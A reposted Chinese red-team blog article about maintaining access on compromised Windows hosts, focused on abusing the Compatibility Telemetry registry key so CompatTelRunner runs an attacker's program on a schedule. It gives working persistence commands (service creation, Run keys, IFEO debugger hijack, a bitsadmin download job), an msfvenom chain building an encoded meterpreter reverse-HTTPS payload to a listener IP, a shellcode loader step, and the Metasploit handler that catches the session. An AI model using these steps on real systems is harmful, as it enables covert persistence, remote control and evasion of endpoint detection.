0

0

红队之浅谈基于Windows telemetry的权限维持

絕刀狂花

絕刀狂花

发布时间:2025-09-04 08:30:22

|

984人浏览过

|

来源于php中文网

原创

这是 酒仙桥六号部队 的第 46 篇文章。

全文共计3084个字,预计阅读时长10分钟。

在我们红队拿到主机权限的时候,我们往往需要通过这台机器进行深一步的渗透,或者目标服务器可能因为系统更新,杀软更新等等原因往往导致会话莫名其妙下线了,所以权限持久化是红队一个必不可少的工作。

常见的权限维持手段有很多,比如:

1、修改服务

系统启动的时候,可以通过服务来运行程序或应用,服务的配置信息存储在注册表中,可以通过修改配置来进行安装服务,运行后能看到AtomicService.exe这个进程。

代码语言:javascript代码运行次数:0运行复制
sc.exe create #{service_name} binPath= #{binary_path}sc.exe start #{service_name}

或者

代码语言:javascript代码运行次数:0运行复制
New-Service -Name "\#{service_name}" -BinaryPathName "\#{binary_path}"Start-Service -Name "\#{service_name}"

2、修改注册表启动项

startup文件夹下添加程序以及修改注册表的某些键值来实现。用户登录后就可实现程序的执行。

Windows会默认执行的相关注册表:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnceHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

3、自启动服务目录

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnceHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnceHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices

4、文件夹目录

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserShell FoldersHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFoldersHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellFoldersHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserShell Folders

5、DLL劫持

应用程序通过DLL(动态链接库)加载外部代码。DLL劫持是利用了DLL的搜索路径优先级并用DLL同名的恶意DLL注入应用程序。

查找可能存在劫持的DLL,一般来说,我们可以使用ProcessExplorer再结合注册表KnownDLLs(windows 7 以上版本)即可分析,可能存在DLL劫持的漏洞。对可能存在DLL劫持的漏洞进行编写,放在同一目录进行POC测试。

6、映像劫持

被称为IFEO(Image File Execution Options)

当用户程序被映像劫持,启动目标程序会被劫持程序给替代。

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Option\[劫持程序名字]

添加debugger键名 值为指向的路径。

也可以命令行管理员直接执行:

代码语言:javascript代码运行次数:0运行复制
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image FileExecution Options\notepad.exe" /t REG_SZ /v Debugger /d"C:\windows\system32\cmd.exe" /f

或者使用gflags工具中的silent process exit功能,在这个程序静态退出的时候可以直接静默执行另一个程序。

7、Com劫持

程序在读取注册表信息中的DLL或者EXE功能的路径上,让程序提前读取设置好的恶意DLL或者EXE,原理其实和DLL劫持相近。

一般的利用方式如下:

通过使用脚本,找出系统没有的或者空出来的COM(NAME NOTFOUND)组件路径,放置劫持的文件。我们也可以直接替换原路径下的文件,或者直接修改原路径加载的文件。

8、BIT后门

Windows内置后台传输工具,即使在应用程序退出后,只要启动传输的用户保持登录状态并保持网络连接,BITS就会继续传输文件,重启后也会续传。

测试脚本:代码语言:javascript代码运行次数:0运行复制
bitsadmin /create testbitsadmin /addfile test "http://x.x.x.x/x "//"C:\tmp\xx"bitsadmin /SetNotifyCmdLine test C:\tmp\xx NULbitsadmin /SetMinRetryDelay "test" 60

bitsadmin /resume test

9、WMIC后门等等。。。。

随着科技的发展,各种终端设备对各种常见的路径,注册表进行了监控。所以我们需要更多的骚姿势来绕过它。

Microsoft Compatibility Telemetry 微软兼容性遥测服务介绍:

CompatTelRunner.exe是用户可以在Windows CompatibilityTelemetry服务下运行的进程,它通常位于C:\ \Windows \\System32目录中。它负责收集有关计算机及其性能的各种技术数据,并将其发送给Microsoft进行Windows客户体验改善计划以及用于Windows操作系统的升级过程中。该进程使用了CPU的极高百分比来进行文件扫描,然后通过Internet连接传输数据。因此,用户还会遇到互联网连接速度较慢甚至系统崩溃的情况。

红队之浅谈基于Windows telemetry的权限维持

Emm…全网都是说这服务怎么去disable的,看来确实很多人不喜欢这玩意儿。

在我们实现中需要以下的条件:

管理员权限,并且可以写入HKLM(HKEY_LOCAL_MACHINE)Windows Server2008R2, 2016, Windows 7 /10测试机器必须有网络连接方法:

在注册表

代码语言:javascript代码运行次数:0运行复制
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController

添加任意命名子项。

添加名称为Command 类型是REG_SZ ,Data value填写我们要执行的exe程序;

创建一个DWORD的KEY,名称可以为Nightly,Oobe,Maintanance并将它们的值设置成1。Nightly模式会以每24小时执行一次。

或者使用下列命令保存文本(以nightly为例),修改reg格式导入即可。

Windows Registry Editor Version 5.00

艾绘
艾绘

艾绘:一站式绘本创作平台,AI智能绘本设计神器!

下载
代码语言:javascript代码运行次数:0运行复制
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController\test]"Command"="c:\\windows\\system32\\notepad.exe""Nightly"=dword:00000001
红队之浅谈基于Windows telemetry的权限维持

如果想立即执行查看效果可以在Cortana搜索框中输入“任务计划”,打开“任务计划程序”,在左侧的导航窗格中依次展开定位至“任务计划程序库。

Microsoft - Windows - Application Experience”,这时你就会在右侧窗格中看到名为Microsoft Compatibility Appraiser 的任务计划,直接右键运行即可。
红队之浅谈基于Windows telemetry的权限维持
红队之浅谈基于Windows telemetry的权限维持

或者管理员直接运行命令行:

代码语言:javascript代码运行次数:0运行复制
schtasks /run /tn "\Microsoft\Windows\Application Experience\MicrosoftCompatibility Appraiser"

等待Microsoft Compatibility Telemetry执行。

红队之浅谈基于Windows telemetry的权限维持

然后在详细信息里面可看到程序执行成功了。

红队之浅谈基于Windows telemetry的权限维持

有意思的是,CompatTelRunner.exe不是系统启动运行或者用户登录,它是一个周期性的任务,这样可以逃避很多检测。

红队之浅谈基于Windows telemetry的权限维持

我们也可以在触发器中对其进行修改成我们需要的执行时间。

红队之浅谈基于Windows telemetry的权限维持

我们这里使用msf做个简单的测试:

用msf自带混淆做个raw。

代码语言:javascript代码运行次数:0运行复制
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.11.130 LPORT=8888--platform windows -a x86 -s 42 --smallest -e x86/shikata_ga_nai -i 9 -f raw|msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom--platform windows -a x86 -e x86/call4_dword_xor -i 6 -b "\x00\x0a\x0d" -fraw > ~/Desktop/shellcode.raw
红队之浅谈基于Windows telemetry的权限维持

我们这里使用shellcode加载器:

https://github.com/clinicallyinane/shellcode_launcher/

目标机执行即可:

shellcode_launcher.exe -i shellcode.raw

这里写个脚本运行。(这里也能使用dll注入等各种方法,记得将其注入到其他进程中,不然进程会结束。反弹shell命令也不宜过长,同样的道理。)

红队之浅谈基于Windows telemetry的权限维持

KALI:

代码语言:javascript代码运行次数:0运行复制
msfconsole -q -x 'use exploit/multi/handler; set ExitOnSession false; setPAYLOAD windows/meterpreter/reverse_winhttps;set LHOST 192.168.11.130;set LPORT8888; run -j -z'
红队之浅谈基于Windows telemetry的权限维持

我们直接输入命令测试一下:

红队之浅谈基于Windows telemetry的权限维持

SESSION1 成功上线了。

红队之浅谈基于Windows telemetry的权限维持
怎么实现的?

当CompatTelRunner运行遥测任务之前,会首先检查一些条件,而且必须要满足这些条件之一。

系统为 Windows10或者Server2019。系统为Windows版本的客户端。键值:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection\CommercialDataOptIn是 DWORD 的类型且不为0

有趣的是,在WindowsServer2016发行后某个版本添加了上面的检查条件。而在CompatTelRunner.exe更新版本之前,这些检查将不会执行,并且将执行注册表项中的Command命令,而与windows版本无关。

无论有没有成功检查,存在命令行参数将决定程序在哪种运行模式下运行。存在三种与某些条件相对应的运行模式。

如果命令行参数指定了一个DLL或者function。则CompatTelRunner.exe会根据批准的列表对它们进行验证。这将导致CompatTelRunner.exe启动DLL提供程序并退出。如果未提供DLL/功能名称,程序将继续识别运行模式。

如果HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ WindowsNT \ CurrentVersion\ AppCompatFlags \ TelemetryController \Oobe存在并且没有-maintenance参数,则进入运行模式二(OOBE),该键将在检查后被删除。

如果提供了-maintenance参数,那么我们需要验证运行并进入模式0,并需要验证系统状态:

1.HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ WindowsNT \ CurrentVersion\ AppCompatFlags \ TelemetryController \ TestAllowRun设置的REG_DWORD不能为0

2.通过系统状态验证。

系统状态验证检测件又由以下几个条件组成:

“Power Saver” (节电器)必须是关闭状态。机器处于充电状态。如果程序前四次验证失败,如果电池状态未知,电池电量大于5%或正在充电则则也通过验证。

如果通过了一次验证,程序将重置注册表键值RunsBlocked为0。如果没有通过则将注册表键值 RunsBlocked加1。

红队之浅谈基于Windows telemetry的权限维持

如果未传递任何命令行参数,则CompatTelRunner.exe将进入运行模式一(Nightly)。

确定运行模式后,将对计划任务执行一些检查。然后进入RunTelemetry区域。

如果模式为0(-maintenance),则需要进行一些额外的检查。检查结束后或者模式不为0,则程序打开

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController.

所有子项均在此文件夹下枚举,并在初始化调用中用于填充结构。

红队之浅谈基于Windows telemetry的权限维持

从反汇编中,可以看出这些字段是从注册表项填充的:

Command populates the LPWSTR Command/CommandByteLenMaintenance sets BoolMaintenanceNightly sets BoolNightlyOobe sets BoolOobeSku sets the DWORD DWSKUSchedulingNeeded sets BoolSchedulingNeeded

可以将指定的命令将被加载到缓冲区中,如下所示:

代码语言:javascript代码运行次数:0运行复制
char command[520] = {0};  StringCchCatW(command, 260, L”%ls %ls%hs”, this->CommandStr, L”-cv”, );

根据使用的运行模式/计划,可以将-oobe-fullsync添加到命令行。最终,它作为第二个参数传递给函数CreateProcessW(CreateProcessW)用于创建一个新进程及其主线程。新进程在调用进程安全的运行。等效于将其作为shell命令运行。

这里需要注意的是如果是任务进程结束后,我们的子项也会跟着结束进程。

总结:在红蓝对抗中,套路总是在不断变化的,红队一直在寻找新颖有趣的方法来在目标网络上实现相同的目标,对此我们也需要不断学习新的姿势和套路来不断完善自己与团队。
红队之浅谈基于Windows telemetry的权限维持
红队之浅谈基于Windows telemetry的权限维持

参考文献:

https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/

热门AI工具

更多
DeepSeek
DeepSeek

幻方量化公司旗下的开源大模型平台

豆包大模型
豆包大模型

字节跳动自主研发的一系列大型语言模型

通义千问
通义千问

阿里巴巴推出的全能AI助手

腾讯元宝
腾讯元宝

腾讯混元平台推出的AI助手

文心一言
文心一言

文心一言是百度开发的AI聊天机器人,通过对话可以生成各种形式的内容。

讯飞写作
讯飞写作

基于讯飞星火大模型的AI写作工具,可以快速生成新闻稿件、品宣文案、工作总结、心得体会等各种文文稿

即梦AI
即梦AI

一站式AI创作平台,免费AI图片和视频生成。

ChatGPT
ChatGPT

最最强大的AI聊天机器人程序,ChatGPT不单是聊天机器人,还能进行撰写邮件、视频脚本、文案、翻译、代码等任务。

相关专题

更多
线程和进程的区别
线程和进程的区别

线程和进程的区别:线程是进程的一部分,用于实现并发和并行操作,而线程共享进程的资源,通信更方便快捷,切换开销较小。本专题为大家提供线程和进程区别相关的各种文章、以及下载和课程。

503

2023.08.10

线程和进程的区别
线程和进程的区别

线程和进程的区别:线程是进程的一部分,用于实现并发和并行操作,而线程共享进程的资源,通信更方便快捷,切换开销较小。本专题为大家提供线程和进程区别相关的各种文章、以及下载和课程。

503

2023.08.10

function是什么
function是什么

function是函数的意思,是一段具有特定功能的可重复使用的代码块,是程序的基本组成单元之一,可以接受输入参数,执行特定的操作,并返回结果。本专题为大家提供function是什么的相关的文章、下载、课程内容,供大家免费下载体验。

483

2023.08.04

js函数function用法
js函数function用法

js函数function用法有:1、声明函数;2、调用函数;3、函数参数;4、函数返回值;5、匿名函数;6、函数作为参数;7、函数作用域;8、递归函数。本专题提供js函数function用法的相关文章内容,大家可以免费阅读。

163

2023.10.07

github中文官网入口 github中文版官网网页进入
github中文官网入口 github中文版官网网页进入

github中文官网入口https://docs.github.com/zh/get-started,GitHub 是一种基于云的平台,可在其中存储、共享并与他人一起编写代码。 通过将代码存储在GitHub 上的“存储库”中,你可以: “展示或共享”你的工作。 持续“跟踪和管理”对代码的更改。

871

2026.01.21

windows查看端口占用情况
windows查看端口占用情况

Windows端口可以认为是计算机与外界通讯交流的出入口。逻辑意义上的端口一般是指TCP/IP协议中的端口,端口号的范围从0到65535,比如用于浏览网页服务的80端口,用于FTP服务的21端口等等。怎么查看windows端口占用情况呢?php中文网给大家带来了相关的教程以及文章,欢迎大家前来阅读学习。

762

2023.07.26

查看端口占用情况windows
查看端口占用情况windows

端口占用是指与端口关联的软件占用端口而使得其他应用程序无法使用这些端口,端口占用问题是计算机系统编程领域的一个常见问题,端口占用的根本原因可能是操作系统的一些错误,服务器也可能会出现端口占用问题。php中文网给大家带来了相关的教程以及文章,欢迎大家前来学习阅读。

1129

2023.07.27

windows照片无法显示
windows照片无法显示

当我们尝试打开一张图片时,可能会出现一个错误提示,提示说"Windows照片查看器无法显示此图片,因为计算机上的可用内存不足",本专题为大家提供windows照片无法显示相关的文章,帮助大家解决该问题。

801

2023.08.01

俄罗斯Yandex引擎入口
俄罗斯Yandex引擎入口

2026年俄罗斯Yandex搜索引擎最新入口汇总,涵盖免登录、多语言支持、无广告视频播放及本地化服务等核心功能。阅读专题下面的文章了解更多详细内容。

158

2026.01.28

热门下载

更多
网站特效
/
网站源码
/
网站素材
/
前端模板

精品课程

更多
相关推荐
/
热门推荐
/
最新课程
PostgreSQL 教程
PostgreSQL 教程

共48课时 | 8万人学习

Excel 教程
Excel 教程

共162课时 | 14.1万人学习

PHP基础入门课程
PHP基础入门课程

共33课时 | 2万人学习

关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送

Copyright 2014-2026 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号